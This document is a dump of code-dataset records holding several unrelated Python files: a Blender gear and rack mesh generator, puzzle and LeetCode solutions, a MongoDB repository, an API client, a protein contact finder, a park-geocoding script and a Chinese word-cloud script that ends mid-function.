(2.25-x) * module\n bk = 1 / jeu\n Fillet = 0\n else:\n Bottom = PitchRadius - Dedendum - Fillet\n Ded = PitchRadius - Dedendum\n Add = PitchRadius + Addendum\n bk = jeu\n Base = PitchRadius * cos(Ag)\n DiametralPitch = TeethN/(2.0*PitchRadius)\n # ToothThickness = 1.5708/DiametralPitch\n CircularPitch = pi / DiametralPitch\n Theta0 = CircularPitch/(PitchRadius*2.0)\n\n # solve for involute thickness\n csphi = bk/cos(Ag)\n csphi = csphi*csphi\n csded = (Ded/PitchRadius)*(Ded/PitchRadius)/(cos(Ag)*cos(Ag))\n # csbevel = 
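# The flank points appended below follow the involute of the base circle
# Base = PitchRadius*cos(Ag); a minimal numeric sketch of the standard
# parametric involute (the add-on mirrors the y term and then rotates by txx):
from math import cos, sin

def involute_points(base_radius, steps=5, t_max=0.6):
    # Involute of a circle: x = Rb*(cos t + t*sin t), y = Rb*(sin t - t*cos t)
    pts = []
    for i in range(steps + 1):
        t = t_max * i / steps
        pts.append((base_radius * (cos(t) + t * sin(t)),
                    base_radius * (sin(t) - t * cos(t))))
    return pts

for x, y in involute_points(18.0):
    print(round(x, 3), round(y, 3))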
(Add/PitchRadius)*(Add/PitchRadius)/(cos(Ag)*cos(Ag))\n    th = 0\n    thd = 0\n    aeqx = 0\n    aeqDed = 0\n    Precision = 400\n    for i in range(Precision):\n        tx = (i/Precision) * (pi/4)\n        ft = ((cos(tx)+tx*sin(tx)))*((cos(tx)+tx*sin(tx))) + ((sin(tx)-tx*cos(tx))) * ((sin(tx)-tx*cos(tx)))\n        aeqxl = aeqx\n        aeqDedl = aeqDed\n        aeqx = ft - csphi\n        aeqDed = ft - csded\n        if i > 1:\n            if ((aeqx*aeqxl) <= 0):\n                th = tx\n                break\n            if ((aeqDed*aeqDedl) <= 0):\n                thd = tx\n\n    txx = Theta0/2 - atan((-sin(th)+th*cos(th))/(cos(th)+th*sin(th)))\n    if thd == 0:\n        txd = atan(tan(txx)*Base/Ded)\n    else:\n        txd = txx + atan((-sin(thd)+thd*cos(thd))/(cos(thd)+thd*sin(thd)))\n    # fillet angle\n    thf = atan(Fillet/Bottom)\n    txf = txd+thf\n\n    '''if prop==\"cro\" and pinion==False :\n        txx = - txx'''\n\n    ####################################################################\n    # Mesh\n    #\n    Nr = Resolution\n    points = []\n\n    # bottom of tooth\n    points.append([Bottom*cos(Theta0), Bottom*sin(Theta0)])\n\n    # Fillet\n    xc = Ded*cos(txf)\n    yc = Ded*sin(txf)\n    Aw = pi/2.0 + txd - txf\n    for i in range(Nr-1):\n        thv = (Aw)*(i+1)/(Nr) + pi + txf\n        points.append([xc + Fillet*cos(thv), yc + Fillet*sin(thv)])\n\n    # Tooth Involute\n    Theta5 = 0\n    nIntoth = 0\n    dteta = pi/(TeethN*50*Resolution)\n    dref = (Add-Ded)/(3*Nr)\n    az = xc + Fillet*cos(thv)\n    bz = yc + Fillet*sin(thv)\n    Rl = sqrt(az*az+bz*bz)\n    thv = txx+Theta0/2\n    for i in range(5000):\n        sx = Base*(cos(thv)+thv*sin(thv))\n        sy = -Base*(sin(thv)-thv*cos(thv))\n        if sx > Ded:\n            apointsx = sy * sin(txx)+sx*cos(txx)\n            apointsy = sx * sin(txx)+sy*cos(txx)\n            R = sqrt(apointsx*apointsx+apointsy*apointsy)\n            if R > Add or apointsy <= 0:\n                break\n            if (R-Rl) > dref:\n                Rl = R\n                points.append([apointsx, apointsy])\n                nIntoth = nIntoth + 1\n                Theta5 = atan(apointsy/apointsx)\n        thv = thv + dteta\n\n    # Tooth Top\n    for i in range(Nr-1):\n        thv = Theta5 * (1-(i+1)/Nr)\n        points.append([Add*cos(thv), Add*sin(thv)])\n\n    # Mirrors\n    Nr = len(points)\n    for i in range(Nr):\n        P = points[Nr-1-i]\n        points.append([P[0], -P[1]])\n\n    return points\n\n\n####################################################################\n# CREATES THE BASE RACK PROFILE\n####################################################################\n\ndef RackOutline():\n\n    ####################################################################\n    # Basic Math computations: Quotes\n    #\n    X = {\n        'Bottom': - Dedendum - Fillet,\n        'Ded': - Dedendum,\n        'Bevel': Addendum - Bevel,\n        'Add': Addendum\n    }\n\n    ####################################################################\n    # Basic Math computations: Angles\n    #\n    DiametralPitch = TeethN/(2*PitchRadius)\n    ToothThickness = 1.5708/DiametralPitch\n    CircularPitch = pi / DiametralPitch\n    Pa = PressureAng*pi/180.0\n    yA1 = ToothThickness/2.0\n    yA2 = (-X['Ded']+Fillet*sin(Pa))*tan(Pa)\n    yA3 = Fillet*cos(Pa)\n\n    A = {\n        'y0': CircularPitch/2.0,\n        'y1': yA1 + yA2 + yA3,\n        'y2': yA1 + yA2,\n        'y3': yA1 - (X['Add']-Bevel) * tan(Pa),\n        'y4': yA1 - (X['Add']-Bevel) * tan(Pa) - cos(Pa) / (1-sin(Pa)) * Bevel\n    }\n\n    ####################################################################\n    # Profiling\n    #\n    N = Resolution\n    points = []\n    normals = []\n    # Top half bottom of tooth\n    for i in range(2*N):\n        y = (A['y1'] - A['y0'])*i/(2*N-1) + A['y0']\n        points.append([X['Bottom'], y])\n        normals.append([-1.0, -0.0])\n\n    # Bottom Fillet\n    xc = X['Ded']\n    yc = A['y1']\n    Aw = pi/2.0 - Pa\n    for i in range(N):\n        th = (Aw)*(i+1)/(N) + pi\n        points.append([xc + Fillet*cos(th), yc + Fillet*sin(th)])\n        normals.append([cos(th), sin(th)])\n\n    # Straight 
part\n Xded = X['Ded'] - Fillet*sin(Pa)\n for i in range(4*N):\n x = (X['Bevel']-Xded)*(i+1)/(4*N) + Xded\n points.append([x, yA1-tan(Pa)*x])\n normals.append([-sin(Pa), -cos(Pa)])\n\n # Tooth Bevel\n rA = Bevel/(1-sin(Pa))\n xc = X['Add'] - rA\n yc = A['y4']\n for i in range(N):\n th = (-pi/2.0+Pa)*(i+1)/(N) + pi/2.0-Pa\n points.append([xc + rA*cos(th), yc + rA*sin(th)])\n normals.append([-cos(th), -sin(th)])\n\n # Tooth Top\n for i in range(N):\n y = -A['y4']*(i+1)/(N) + A['y4']\n points.append([X['Add'], y])\n normals.append([-1.0, 0.0])\n\n # Mirrors this!\n N = len(points)\n for i in range(N-1):\n P = points[N-2-i]\n points.append([P[0], -P[1]])\n V = normals[N-2-i]\n normals.append([V[0], -V[1]])\n\n return points, normals\n\n\n####################################################################\n# CREATES THE BASE CROWN INVOLUTE\n####################################################################\n\ndef CrownOutline():\n\n ####################################################################\n # Basic Math computations: Radii\n #\n R = {\n 'Bottom': PitchRadius * cos(PressureAng*pi/180.0),\n 'Base': PitchRadius * cos(PressureAng*pi/180.0) + Fillet,\n 'Ded': PitchRadius + Dedendum\n }\n\n ####################################################################\n # Basic Math computations: Angles\n #\n DiametralPitch = TeethN/(2*PitchRadius)\n ToothThickness = 1.5708/DiametralPitch\n CircularPitch = pi / DiametralPitch\n\n U1 = sqrt((1-cos(PressureAng*pi/180.0))/cos(PressureAng*pi/180.0))\n U2 = sqrt(R['Ded']*R['Ded']/(R['Base']*R['Base'])-1)\n\n ThetaA1 = atan((sin(U1)-U1*cos(U1))/(cos(U1)+U1*sin(U1)))\n ThetaA2 = atan((sin(U2)-U2*cos(U2))/(cos(U2)+U2*sin(U2)))\n ThetaA3 = ThetaA1 + ToothThickness/(PitchRadius*2.0)\n\n A = {\n 'Theta0': CircularPitch/(PitchRadius*2.0),\n 'Theta1': (ThetaA3 + Fillet/R['Base']),\n 'Theta2': ThetaA3,\n 'Theta3': ThetaA3 - ThetaA2,\n 'Theta4': ThetaA3 - ThetaA2 - Bevel/R['Ded']\n }\n\n M = A['Theta0']\n A['Theta0'] = 0\n A['Theta1'] = A['Theta1']-M\n A['Theta2'] = A['Theta2']-M\n A['Theta3'] = A['Theta3']-M\n A['Theta4'] = A['Theta4']-M\n\n ####################################################################\n # Profiling\n #\n N = Resolution\n apoints = []\n anormals = []\n\n # Top half top of tooth\n for i in range(2*N):\n th = (A['Theta1'] - A['Theta0'])*i/(2*N-1) + A['Theta0']\n apoints.append([R['Bottom']*cos(th), R['Bottom']*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n # Bottom Bevel\n xc = R['Base']*cos(A['Theta1'])\n yc = R['Base']*sin(A['Theta1'])\n Aw = pi/2.0 + A['Theta2'] - A['Theta1']\n for i in range(N):\n th = (Aw)*(i+1)/(N) + pi + A['Theta1']\n apoints.append([xc + Fillet*cos(th), yc + Fillet*sin(th)])\n anormals.append([-cos(th), -sin(th)])\n\n # Tooth Involute\n for i in range(4*N):\n r = (R['Ded'] - R['Base'])*(i+1)/(4*N) + R['Base']\n u = sqrt(r*r/(R['Base']*R['Base'])-1)\n xp = R['Base']*(cos(u)+u*sin(u))\n yp = - R['Base']*(sin(u)-u*cos(u))\n apoints.append([xp*cos(A['Theta2'])-yp*sin(A['Theta2']), +xp*sin(A['Theta2'])+yp*cos(A['Theta2'])])\n anormals.append([sin(u), cos(u)])\n\n # Tooth Bevel\n auxth = -u\n auxth = auxth + ThetaA3 + pi/2.0\n # m = tan(auxth)\n P0 = apoints[len(apoints)-1]\n rA = Bevel/(1-cos(auxth-A['Theta4']))\n xc = P0[0] - rA*cos(auxth)\n yc = P0[1] - rA*sin(auxth)\n for i in range(N):\n th = (A['Theta4'] - auxth)*(i+1)/(N) + auxth\n apoints.append([xc + rA*cos(th), yc + rA*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n # Tooth Top\n P0 = apoints[len(apoints)-1]\n A['Theta4'] = atan(P0[1]/P0[0])\n Ra = 
sqrt(P0[0]*P0[0]+P0[1]*P0[1])\n for i in range(N):\n th = (-M - A['Theta4'])*(i+1)/(N) + A['Theta4']\n apoints.append([Ra*cos(th), Ra*sin(th)])\n anormals.append([cos(th), sin(th)])\n\n points = []\n normals = []\n N = len(apoints)\n for i in range(N):\n points.append(apoints[N-1-i])\n normals.append(anormals[N-1-i])\n\n # Mirrors this!\n N = len(points)\n for i in range(N-1):\n P = points[N-2-i]\n points.append([P[0], -P[1]])\n V = normals[N-2-i]\n normals.append([V[0], -V[1]])\n\n return points, normals\n\n\n######################################################\n# Mesh the crown\n######################################################\ndef SolCrown(Vert):\n\n vertcs = []\n facecs = []\n\n Thicn = Thickness / 2\n Psi = HelicalAng*pi / 180.0\n\n ###################################################################\n # make thickness\n for i in range(LongRes):\n z = Thicn - (Thickness)*(i)/(LongRes-1)\n sq = z*tan(Psi)\n Phi = sq/PitchRadius\n\n for j in range(len(Vert)):\n p = Vert[j]\n\n x = p[0]\n y = p[1]\n vertcs.append((x*cos(Phi)+y*sin(Phi), -x*sin(Phi)+y*cos(Phi), z))\n\n ####################################################################\n # make Faces\n NV = len(Vert)\n NL = LongRes-1\n N2 = Resolution\n FVC = len(vertcs)\n\n for i in range(NL):\n for j in range(NV-1):\n facecs.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n ####################################################################\n # make top\n p0 = vertcs[0]\n p1 = vertcs[NV-1]\n th0 = atan(p0[1]/p0[0])\n th1 = atan(p1[1]/p1[0])\n R = PitchRadius\n N = 2*Resolution\n Wid = -Width\n\n for i in range(N-2):\n th = (th1-th0)*i/(N-3)+th0\n vertcs.append(((R-Wid)*cos(th), (R-Wid)*sin(th), Thickness/2.0))\n\n for i in range(nIntoth+N2):\n facecs.append((i, i+1, FVC))\n\n for i in range(N-3):\n facecs.append((nIntoth+N2+i, nIntoth+N2+i+1, FVC+i+1, FVC+i))\n\n NN = NV-nIntoth-N2-1\n for i in range(nIntoth+N2):\n facecs.append((NN+i, NN+i+1, FVC+N-3))\n\n # make bottom\n F1 = NL*NV\n FVT = FVC\n FVC = len(vertcs)\n tha = th1\n th1 = -th0\n th0 = -tha\n\n for i in range(N-2):\n th = ((th1-th0)*i/(N-3)+th0)\n vertcs.append(((R-Wid)*cos(th), (R-Wid)*sin(th), -Thickness/2.0))\n\n for i in range(nIntoth+N2):\n facecs.append((F1+i, F1+i+1, FVC))\n\n for i in range(N-3):\n facecs.append((F1+nIntoth+N2+i, F1+nIntoth+N2+i+1, FVC+i+1, FVC+i))\n\n NN = F1+NV-nIntoth-N2-1\n for i in range(nIntoth+N2):\n facecs.append((NN+i, NN+i+1, FVC+N-3))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N-3):\n facecs.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n\n return vertcs, facecs\n","sub_path":"Add_Mesh_Gear.py","file_name":"Add_Mesh_Gear.py","file_ext":"py","file_size_in_byte":32776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"460163590","text":"def max_index(x):\n\treturn 5 - x\n\ndef most_min_asleep():\n\twith open(\"day4.txt\", 'r') as f:\n\t\tshifts = sorted([line.strip(\"\\n\") for line in f])\n\t\tguard_asleep = {}\n\t\tmins_per_guard = {}\n\t\tfor line in shifts:\n\t\t\tif '#' in line:\n\t\t\t\tid_index = line.find('#')\n\t\t\t\tguard_id = line[id_index + 1:id_index + line[id_index:].find(' ')]\n\t\t\telif \"falls asleep\" in line:\n\t\t\t\tsleep_start = int(line[15:17])\n\t\t\telse:\n\t\t\t\tmins_asleep = int(line[15:17]) - sleep_start\n\t\t\t\tif guard_id in guard_asleep:\n\t\t\t\t\tguard_asleep[guard_id] += mins_asleep\n\t\t\t\telse:\n\t\t\t\t\tguard_asleep[guard_id] = mins_asleep\n\t\t\t\t\tmins_per_guard[guard_id] = [0 for i in range(60)]\n\t\t\t\tfor 
minute in range(mins_asleep):\n\t\t\t\t\tmins_per_guard[guard_id][sleep_start + minute] += 1\n\n\t\tmost_sleep_guard_id = max(guard_asleep, key=guard_asleep.get)\n\t\tmost_common_min = max(range(60), key=lambda n: mins_per_guard[most_sleep_guard_id][n])\n\n\t\tprint(most_sleep_guard_id, most_common_min)\n\t\tprint(\"Product =\", int(most_sleep_guard_id) * most_common_min)\n\n\t\t# -- PART 2 --\n\t\tmax_repeats = 0\n\t\tfor guard in mins_per_guard:\n\t\t\tif max(mins_per_guard[guard]) > max_repeats:\n\t\t\t\tmax_repeats = max(mins_per_guard[guard])\n\t\t\t\tmost_repeated_min = max(range(60), key=lambda n: mins_per_guard[guard][n])\n\t\t\t\tmax_guard = guard\n\n\t\tprint(max_guard, most_repeated_min)\n\t\tprint(\"Product =\", int(max_guard) * most_repeated_min)\n\nmost_min_asleep()","sub_path":"aoc-2018/2018 Day 4.py","file_name":"2018 Day 4.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"595334488","text":"from pymongo import MongoClient\n\nfrom models.phrase import Phrase\n\n\nclass PhraseRepository(object):\n\n def __init__(self, url, port):\n \"\"\"\n :type url: str\n :type port: int\n \"\"\"\n self.client = MongoClient(url,\n port)\n\n # username=user,\n # password=password,\n # authMechanism='SCRAM-SHA-256')\n self.database = self.client.bunq_csr\n self.phrase_collection = self.database.phrases\n\n def create(self, phrase):\n \"\"\"\n :type phrase: Phrase\n :rtype: Phrase\n \"\"\"\n if phrase is not None:\n self.phrase_collection.insert(phrase.get_as_json())\n else:\n raise Exception(\"Nothing to save, because project parameter is None\")\n\n def read(self, phrase_id=None):\n \"\"\"\n :rtype: list[Phrase]\n \"\"\"\n if phrase_id is None:\n return self.phrase_collection.find({})\n else:\n return self.phrase_collection.find({\"_id\": phrase_id})\n","sub_path":"repositories/phrase_repository.py","file_name":"phrase_repository.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"422064968","text":"from datetime import datetime, timedelta\nimport requests\nimport logging\nimport json\nimport base64\n\nclass MaxposterApi:\n\tdef __init__(self, config, project_key, zone = '+03:00'):\n\t\tself.config = config\n\t\tself.project_key = project_key\n\t\tself.zone_str = zone\n\t\tself.__url = 'https://api.maxposter.ru/partners-api'\n\t\tself.__token = base64.b64encode(bytes('{0!s}:{1!s}'.format(self.config['login'], self.config['token']),'utf-8')).decode()\n\t\tself.__request_headers = {\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'Authorization': 'Basic {0!s}'.format(self.__token)\n\t\t}\n\t\tself.testAuth()\n\tdef testAuth(self, simulate = True):\n\t\tif not simulate:\n\t\t\trequest = requests.get(\n\t\t\t\t'{0!s}/directories/call-sources.json'.format(self.__url),\n\t\t\t\tdata = json.dumps({ 'limit': 10, 'offset': 0, 'orders': ['-id']}, ensure_ascii=False),\n\t\t\t\theaders = self.__request_headers\n\t\t\t)\n\t\t\ttry:\n\t\t\t\tresponse = json.loads(request.text)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error('MP: PARSE: ERROR: {1!s} :{0!s}'.format(str(e), request.text))\n\t\t\t\traise Exception('Auth Failed')\n\t\t\tif request.status_code != 200 or response.get('status', '') == 'error':\n\t\t\t\tself.auth_status = 403\n\t\t\t\tlogging.error('MP : AUTH : ERROR :{0!s}'.format(response.get('message')))\n\t\t\t\traise Exception('Auth Failed')\n\t\tself.auth_status = 
200\n\t\treturn True\n\tdef endSession(self):\n\t\treturn True\n\tdef getAuthStatus(self):\n\t\treturn self.auth_status\n\tdef captureStats(self, start_date, end_date=None):\n\t\tif type(start_date) != datetime:\n\t\t\tstart_date = datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n\t\tif end_date is None:\n\t\t\tend_date = datetime.now()\n\t\telse:\n\t\t\tif type(end_date) != datetime:\n\t\t\t\tend_date = datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')\n\t\tresult = []\n\t\tlimit = 100\n\t\tresults_len = 1\n\t\toffset = 0\n\t\twhile offset < results_len:\n\t\t\tbody = {\n\t\t\t\t'limit': limit,\n\t\t\t\t'offset': offset,\n\t\t\t\t'orders': ['-sessionStartedAt'],\n\t\t\t\t'filters': [{\n\t\t\t\t\t'fields': 'sessionStartedAt',\n\t\t\t\t\t'type': 'between',\n\t\t\t\t\t'value': [start_date.strftime('%Y-%m-%dT%H:%M:%S') + self.zone_str, end_date.strftime('%Y-%m-%dT%H:%M:%S') + self.zone_str]\n\t\t\t\t}]\n\t\t\t}\n\t\t\trequest = requests.post('{0!s}/calls'.format(self.__url), json.dumps(body, ensure_ascii=False), headers = self.__request_headers)\n\t\t\ttry:\n\t\t\t\tresponse = json.loads(request.text)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error('MP: PARSE: ERROR: {1!s} : {0!s}'.format(str(e), request.text))\n\t\t\t\traise Exception('Bad format')\n\t\t\tif request.status_code != 200 or response.get('status', '') == 'error':\n\t\t\t\tlogging.error('MP : AUTH : ERROR : {0!s}'.format(response.get('message')))\n\t\t\t\traise Exception('Query Failed')\n\t\t\tcalls = response.get('data', {}).get('calls', [])\n\t\t\tresult += calls\n\t\t\toffset = (offset + len(calls)) if len(calls) > 0 else 1\n\t\t\tresults_len = int(response.get('data', {}).get('meta', {}).get('range', {}).get('total', '0'))\n\t\treturn result\n\n","sub_path":"systems/maxposter.py","file_name":"maxposter.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535760882","text":"#!/usr/bin/env python\n\n__author__ = \"Tomasz Kosciolek\"\n__version__ = \"1.01b\"\n__last_update__ = \"07/04/2016\"\n\nimport numpy as np\nfrom optparse import OptionParser\nfrom contacts import calc_distance, get_PDB_coordinates\n\n\ndef find_contacts(out_fh, coords, seq_sep, contact_coff):\n # calc distances\n for i in range(len(coords)):\n actual = coords[i][0]\n for j in coords[i:]:\n if j[0] >= actual + int(seq_sep):\n distance = calc_distance(coords[i][1], j[1],\n coords[i][2], j[2],\n coords[i][3], j[3])\n if distance <= float(contact_coff):\n out_fh.write('%s\\t%s\\t%s\\n' % (str(actual),\n str(j[0]), str(distance)))\n actual = []\n out_fh.close()\n\n\ndef main():\n parser = OptionParser(usage=\"usage: %prog [OPTIONS] [pdb] [output]\")\n parser.add_option(\"-a\", dest='aminoacid', default='CB',\n help=\"CA, CB etc. (Default: CB)\")\n parser.add_option(\"-c\", dest='cutoff', default='8',\n help=\"Cutoff (Default: 8)\")\n parser.add_option(\"-d\", dest='seq_separation', default='5',\n help=\"Minimum sequence separation (Default: 5)\")\n (options, args) = parser.parse_args()\n\n if len(args) != 2:\n parser.error(\"Incorrect number of arguments!... 
-h for help\")\n\n finp = open(args[0], 'r')\n foutput = open(args[1], 'w')\n\n # extract coords\n coords = get_PDB_coordinates(finp, options.aminoacid)\n\n find_contacts(foutput, coords, options.seq_separation, options.cutoff)\n\n print(\"Done.\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"microprot/scripts/find_contacts.py","file_name":"find_contacts.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"405948830","text":"#!/usr/bin/python3\n\n\n\ndef droga(pole1, pole2):\n if abs(pole1[0]-pole2[0]) > abs(pole1[1]-pole2[1]):\n return abs(pole1[0]-pole2[0])\n\n else:\n return abs(pole1[1]-pole2[1])\n\n\ndef main():\n c = input().split()\n n = int(c[0])\n m = int(c[1])\n \n pola = [0] * (n*m+1)\n\n for i in range(n):\n x = input().split()\n for j in range(m):\n numerPola = int(x[j])\n\n pola[numerPola] = (i, j)\n\n nrPola = 1\n tuptup = 0\n\n while nrPola < n * m:\n tuptup += droga(pola[nrPola] , pola[nrPola + 1])\n nrPola += 1\n \n print(tuptup)\n \n \n\n\nmain() ","sub_path":"2020/05/21/krol.py","file_name":"krol.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"633944750","text":"#print (\"test commit\")\n#sudo pip install requests\nimport requests\nimport urllib.parse \nmain_api='https://opendata.arcgis.com/datasets/3df29a3d088a42d890f11d027ea1c0be_0.geojson'\njson_data =requests.get(main_api).json()\n\n#x=json_data.get(\"features\")\n#y =x[0]\n#x for i in range(902):\n#a =\" \".join(str(l) for l in x)\n#po = a.get(\"properties\")\n#e = po.get(\"PARK_NAME\")\n#print(e)\n\n#fid=[]\n#cleanlist=[]\n#for i in range(902):\n #my_result = json_data['features'][i]['properties']['PARK_NAME']\n #my_result2=json_data.get['feature'] \n #fid.append(my_result,my_result2)\n#[cleanlist.append(x) for x in fid if x is not in cleanlist]\n #for i in fid:\n #print(i) \n #print(type(a))\n #str1 = ''.join(a)\n #print(my_result)\nfid=[] #empty list\ncleanlist=[]\nfor i in range(902):\n my_result = json_data['features'][i]['properties']['PARK_NAME'] #display park names in halifax\n my_result2 = json_data['features'][i]['properties']['HECTARES'] #display the area of park\n fid.append(my_result)\n fid.append(my_result2)\n #removing duplicates in the list\n [cleanlist.append(x) for x in fid if x not in cleanlist]\n\n#second_api='https://maps.google.com/maps/api/geocode/json?'\n#for parks in cleanlist:\n\n #url2=second_api+urllib.parse.urlencode({'address':parks})\n\n#json_data=requests.get(url2).json()\n #formatted_address=json_data['results'][0]['geometry']['location']\n #print(parks)\n #for k,v in formatted_address.items():\n #print(k,v)\nsecond_api='https://maps.google.com/maps/api/geocode/json?'\nfor parks in cleanlist: #unique park names print in new list\n url2=second_api+urllib.parse.urlencode({'address':parks})\n json_data=requests.get(url2).json()\n try:\n formatted_address=json_data['results'][0]['geometry']['location'] #location of the park is displayed\n print(parks)\n for k,v in formatted_address.items():\n print(k,v)\n except:\n pass\n\n","sub_path":"mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"526996676","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModified on Sun Sep 9 15:31:15 2018\n@author: Jing\n@Email: cdxujing@qq.com\nTitle: Leetcode\n\"\"\"\n\n\"\"\"\nGiven a 
paragraph and a list of banned words, return the most frequent word that is not in the list of banned words. It is guaranteed there is at least one word that isn't banned, and that the answer is unique.\n\nWords in the list of banned words are given in lowercase, and free of punctuation. Words in the paragraph are not case sensitive. The answer is in lowercase.\n\nExample:\nInput:\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nOutput: \"ball\"\nExplanation:\n\"hit\" occurs 3 times, but it is a banned word.\n\"ball\" occurs twice (and no other word does), so it is the most frequent non-banned word in the paragraph.\nNote that words in the paragraph are not case sensitive,\nthat punctuation is ignored (even if adjacent to words, such as \"ball,\"),\nand that \"hit\" isn't the answer even though it occurs more because it is banned.\n\"\"\"\n\n\nimport re\n\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nwords = [x.lower() for x in re.split(\"[!?',;. ]\", paragraph) if ((x != '') and (x not in banned))]\nidx = 0\nMax = 0\nfor i in range(len(words)):\n _max = words.count(words[i])\n if _max > Max:\n Max = _max\n idx = i\nprint(words[idx])","sub_path":"leet_code-most_frequence_word.py","file_name":"leet_code-most_frequence_word.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"546452820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sort_utils import swap\n\n\ndef sort(array):\n \"\"\"\n Bubble sort\n Complexity\n Memory\n O(n) - use same array and swap \"in place\"\n Time\n Worst: O(n^2) - when array is reversed\n ((n - 1) + (n - 2) + ... + (n - n))/2 ~ O(n^2)\n Average: O(n^2)\n Best: ϴ(n) - when array is sorted\n \"\"\"\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n for i in range(len(array) - 1):\n if array[i] > array[i + 1]:\n is_sorted = False\n swap(array, i, i + 1)\n","sub_path":"homework2/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"213609251","text":"import pandas as pd\nimport numpy as np\nimport nltk\nimport jieba\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport chardet\nimport seaborn as sns\nimport os\nsns.set_style(\"whitegrid\",{\"font.sans-serif\":['KaiTi', 'Arial']})\npath3 = os.path.join(os.getcwd(),\"dealworld/stopwords.txt\")\nstopwords = {}.fromkeys([line.rstrip() for line in open(path3,'r') ])\n\n\ndef concat_seg(line):\n\tworldlist = jieba.cut(line.strip())\n\toutstr = ''\n\tfor world in worldlist:\n\t\tif(world not in stopwords):\n\t\t\tif(len(world) > 1):\n\t\t\t\tif(world != '\\t'):\n\t\t\t\t\toutstr +=world\n\t\t\t\t\toutstr +=\"/\"\n\treturn outstr\n\n\ndef deal_Field(Field):\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/industryField.txt\")\n\tpath2 = os.path.join(os.getcwd(),\"dealworld/industryField_plus.txt\")\n\tif(os.path.exists(path1)):\n\t\tos.remove(path1)\n\tif(os.path.exists(path2)):\n\t\tos.remove(path2)\n\twith open(path1,'w') as f:\n\t\tfor i in range(len(Field)):\n\t\t\tf.write(Field[i])\n\t\t\tf.write(\"\\n\")\n\tinfile = open(path1,'r')\n\toutfile = open(path2,'w')\n\tfor line in infile:\n\t\tline_seg = concat_seg(line)\n\t\toutfile.write(line_seg)\n\tinfile.close()\n\toutfile.close()\n\n\ndef deal_Name(Name):\n\tpath1 = 
os.path.join(os.getcwd(),\"dealworld/positionName.txt\")\n\tpath2 = os.path.join(os.getcwd(),\"dealworld/positionName_plus.txt\")\n\tif(os.path.exists(path1)):\n\t\tos.remove(path1)\n\tif(os.path.exists(path2)):\n\t\tos.remove(path2)\n\twith open(path1,'w') as f:\n\t\tfor i in range(len(Name)):\n\t\t\t# print(Name[i])\n\t\t\tf.write(Name[i].replace('\\uf0d8',''))\n\t\t\tf.write(\"\\n\")\n\tinfile = open(path1,'r')\n\toutfile = open(path2,'w')\n\tfor line in infile:\n\t\tline_seg = concat_seg(line)\n\t\toutfile.write(line_seg)\n\tinfile.close()\n\toutfile.close()\n\ndef wordcloud_Field():\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/industryField_plus.txt\")\n\tf = open(path1,'r').read()\n\tfont = r\"C:\\Windows\\Fonts\\STZHONGS.TTF\"\n\t# alice_coloring = np.array(plt.imread('xxxxx.jpg'))\n\n\twc = WordCloud(\n\t\tbackground_color='white',\n\t\tfont_path=font,\n\t\tmax_words=200,\n\t\tstopwords=STOPWORDS,\n\t\tmax_font_size=250,\n\t\trandom_state=30,\n\t\theight=860,\n\t\tmargin=2,\n\t\twidth=1000,\n\t\tcollocations=False,\n\t\t# mask=alice_coloring\n\t\t)\n\twc.generate_from_text(f)\n\t# img_colors = ImageColorGenerator(background_Image)\n\t# wc.recolor(color_func=img_colors)\n\tplt.imshow(wc)\n\tplt.axis(\"off\")\n\tplt.show()\n\ndef wordcloud_Name():\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/positionName_plus.txt\")\n\tf = open(path1,'r').read()\n\tfont = r\"C:\\Windows\\Fonts\\STZHONGS.TTF\"\n\t# alice_coloring = np.array(plt.imread('xxxxx.jpg'))\t#使用自定义图片时取消这些注释\n\n\twc = WordCloud(\n\t\tbackground_color='white',\n\t\tfont_path=font,\n\t\tmax_words=200,\n\t\tstopwords=STOPWORDS,\n\t\tmax_font_size=250,\n\t\trandom_state=30,\n\t\theight=860,\n\t\tmargin=2,\n\t\twidth=1000,\n\t\tcollocations=False,\n\t\t# mask=alice_coloring\n\t\t)\n\twc.generate_from_text(f)\n\t# img_colors = ImageColorGenerator(background_Image)\n\t# 